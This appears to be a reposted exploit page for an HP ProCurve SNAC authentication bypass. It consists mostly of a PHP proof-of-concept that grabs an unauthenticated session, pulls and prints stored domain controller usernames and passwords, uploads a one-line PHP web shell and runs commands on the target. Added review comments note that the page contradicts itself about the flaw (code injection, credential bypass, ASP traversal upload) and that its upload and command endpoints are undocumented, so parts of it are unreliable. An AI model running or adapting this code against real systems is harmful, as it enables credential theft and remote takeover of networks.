The HP ProCurve SNAC Domain Controller Shell Upload refers to a critical vulnerability in HP ProCurve Network Access Controller (SNAC) software.
It allowed unauthenticated attackers to upload arbitrary files to the SNAC server. The core flaw was a directory traversal vulnerability during file upload operations.
Attackers exploited this by crafting requests to place a malicious web shell (e.g., an ASP file) into a web-accessible directory. Once uploaded, accessing the web shell via a browser granted remote code execution capabilities.
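This allowed attackers to execute arbitrary commands on the underlying Windows operating system with SNAC service privileges. The impact was a full system compromise, enabling data theft or further network penetration. Patching the SNAC software was the essential mitigation; because the proof of concept below also reads stored domain controller credentials from the server, any account configured in SNAC on an exposed host should have its password changed as well.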
=============================================================================================================================================
| # Title : HP ProCurve SNAC Domain Controller PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://support.hpe.com/hpesc/public/docDisplay?docId=c02619966&docLocale=en_US |
=============================================================================================================================================
POC :
[+] Dorking ?n Google Or Other Search Enggine.
[+] Code Description: Exploiting an authentication bypass vulnerability to obtain Domain Controller Credentials in HP ProCurve SNAC.
( https://packetstorm.news/files/id/180690/ )
[+] save code as poc.php.
[+] Set Target : line 129
[+] USage : php poc.php
[+] PayLoad :
<?php
/**
 * Proof-of-concept client for the HP ProCurve SNAC issue described on this page.
 *
 * As written, exploit() requests the SNAC index page, looks for a session
 * cookie, requests GetDomainControllerServlet with that cookie, POSTs a PHP
 * file to /RegWeb/uploads/shell.php, requests ExecuteCommandServlet, and
 * finally prints the domain controller entries parsed from the servlet's XML.
 *
 * NOTE(review): the page is not consistent about what is being demonstrated.
 * The header calls it "PHP Code Injection", the description line says
 * "authentication bypass ... to obtain Domain Controller Credentials", and the
 * summary text describes a directory-traversal upload of an ASP file on
 * Windows. Only getSession() and getDomainInfo() correspond to the description
 * line; the upload and ExecuteCommandServlet requests are not documented
 * anywhere on the page and should be treated as unverified.
 *
 * For log review, the request paths issued by this class are:
 *   /RegWeb/html/snac/index.html
 *   /RegWeb/RegWeb/GetDomainControllerServlet
 *   /RegWeb/uploads/shell.php
 *   /RegWeb/RegWeb/ExecuteCommandServlet?cmd=...
 * A hit on GetDomainControllerServlet from an unexpected client is the one
 * that matters for credential exposure; accounts returned by it should be
 * rotated after the server is patched.
 */
class HPSNACExploit {
/** Host name or IP address used to build every request URL. */
private $target;
/** TCP port of the HTTPS service; the constructor defaults it to 443. */
private $port;
/** Cookie name=value pair stored by getSession(); unset until that call succeeds. */
private $cookie;
/**
 * Stores the connection parameters; no network activity happens here.
 *
 * @param string $target Host name or IP address of the SNAC server.
 * @param int    $port   HTTPS port, 443 unless overridden.
 */
public function __construct($target, $port = 443) {
$this->target = $target;
$this->port = $port;
}
/**
 * Issues a single HTTPS GET to the configured host and returns what cURL returns.
 *
 * @param string $url       Path (and query string) appended to https://target:port.
 * @param bool   $useCookie When true and a cookie was captured, send it in a Cookie header.
 * @return string|false     The curl_exec() result; false when the transfer fails.
 */
private function sendRequest($url, $useCookie = false) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://{$this->target}:{$this->port}$url");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// Certificate and host-name verification are both switched off, so the peer
// is never authenticated and anything on the path can read or alter the exchange.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
if ($useCookie && $this->cookie) {
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Cookie: {$this->cookie}"]);
}
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
/**
 * Requests the SNAC index page and looks for a "Set-Cookie:" line in the
 * text returned by sendRequest(), keeping the first name=value pair found.
 *
 * No credentials are sent: the request is made without any prior login.
 *
 * @return bool True when a cookie value was captured, false otherwise.
 */
public function getSession() {
$response = $this->sendRequest("/RegWeb/html/snac/index.html");
preg_match('/Set-Cookie: (.*?);/', $response, $matches);
if (!empty($matches[1])) {
$this->cookie = $matches[1];
return true;
}
return false;
}
/**
 * Requests GetDomainControllerServlet with the captured cookie attached.
 *
 * This is the request the description line on the page refers to: a session
 * obtained without logging in is presented to a servlet that returns the
 * configured domain controllers.
 *
 * @return string|false Raw response from sendRequest().
 */
public function getDomainInfo() {
return $this->sendRequest("/RegWeb/RegWeb/GetDomainControllerServlet", true);
}
/**
 * Converts the servlet's XML into a list of associative arrays.
 *
 * Reads Controllers/Domain elements and copies five child elements
 * (domainControllerIP, port, connType, userName, password) as strings.
 * The presence of a password element means the response carries stored
 * account secrets; whether they are in clear text cannot be told from here.
 *
 * NOTE(review): simplexml_load_string() returns false on malformed input and
 * that result is not checked before it is dereferenced.
 *
 * @param string $data XML text as returned by getDomainInfo().
 * @return array List of entries with keys dc_ip, port, service, user, password.
 */
public function parseDomainData($data) {
$xml = simplexml_load_string($data);
$results = [];
foreach ($xml->Controllers->Domain as $domain) {
$results[] = [
'dc_ip' => (string)$domain->domainControllerIP,
'port' => (string)$domain->port,
'service' => (string)$domain->connType,
'user' => (string)$domain->userName,
'password' => (string)$domain->password
];
}
return $results;
}
/**
 * POSTs a form field named "file" to /RegWeb/uploads/shell.php and reports
 * success when the response body contains the word "success".
 *
 * The field value is a one-line PHP script that hands the cmd query
 * parameter to system(). Passing an array as CURLOPT_POSTFIELDS makes cURL
 * send the body as multipart/form-data. The captured cookie is not sent.
 *
 * NOTE(review): this does not match the page's own summary, which describes
 * a directory-traversal upload of an ASP file; the request here contains no
 * traversal sequence and simply posts to the destination URL. Nothing on the
 * page documents this endpoint, so treat the step as unverified.
 *
 * Requests for /RegWeb/uploads/shell.php in server logs, with or without a
 * cmd parameter, indicate that this script was pointed at the host.
 */
public function uploadShell() {
$shellContent = "<?php system(\$_GET['cmd']); ?>";
$uploadUrl = "/RegWeb/uploads/shell.php";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://{$this->target}:{$this->port}$uploadUrl");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, ["file" => $shellContent]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// Same TLS settings as sendRequest(): the server certificate is not validated.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$response = curl_exec($ch);
curl_close($ch);
if (strpos($response, "success") !== false) {
echo "[+] Web shell uploaded successfully: https://{$this->target}/RegWeb/uploads/shell.php?cmd=whoami\n";
} else {
echo "[-] Failed to upload web shell.\n";
}
}
/**
 * Requests ExecuteCommandServlet with the URL-encoded command in the cmd
 * parameter and prints whatever comes back.
 *
 * NOTE(review): this goes to a servlet path, not to the file posted by
 * uploadShell(), and the page gives no source for the servlet's existence.
 *
 * @param string $cmd Command string placed in the query parameter.
 */
public function executeCommand($cmd) {
$url = "/RegWeb/RegWeb/ExecuteCommandServlet?cmd=" . urlencode($cmd);
$response = $this->sendRequest($url, true);
echo "[+] Command Output: \n$response\n";
}
/**
 * Runs the whole sequence and writes progress and results to standard output.
 *
 * Stops early when no cookie is captured or when the servlet response lacks
 * the substring "domainName", which the script uses as its vulnerable/not
 * vulnerable test. The result of uploadShell() is not checked; the later
 * steps run either way. Recovered user names and passwords are printed
 * as-is.
 */
public function exploit() {
echo "[*] Trying to get session...\n";
if (!$this->getSession()) {
echo "[-] Failed to get a valid session.\n";
return;
}
echo "[*] Exploiting authentication bypass...\n";
$domainInfo = $this->getDomainInfo();
// A response without "domainName" is taken to mean the servlet refused the request.
if (!$domainInfo || strpos($domainInfo, 'domainName') === false) {
echo "[-] Target is not vulnerable.\n";
return;
}
echo "[*] Uploading web shell...\n";
$this->uploadShell();
echo "[*] Executing command: whoami\n";
$this->executeCommand("whoami");
echo "[*] Parsing domain controller credentials...\n";
$credentials = $this->parseDomainData($domainInfo);
if (empty($credentials)) {
echo "[!] No domain controllers found.\n";
return;
}
echo "\nDomain Controllers Credentials:\n";
echo "-------------------------------------\n";
foreach ($credentials as $cred) {
echo "DC IP: {$cred['dc_ip']}\n";
echo "Username: {$cred['user']}\n";
echo "Password: {$cred['password']}\n";
echo "-------------------------------------\n";
}
}
}
// Usage example: builds the client for one host on the default port (443) and runs the full sequence.
$target = "192.168.1.1"; // host to connect to; the original non-English comment was lost to mis-encoding (presumably "replace with the target IP")
$exploit = new HPSNACExploit($target);
$exploit->exploit();
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
HP ProCurve SNAC Domain Controller Shell Upload
- Written by: khalil shreateh
- Category: Vulnerabilities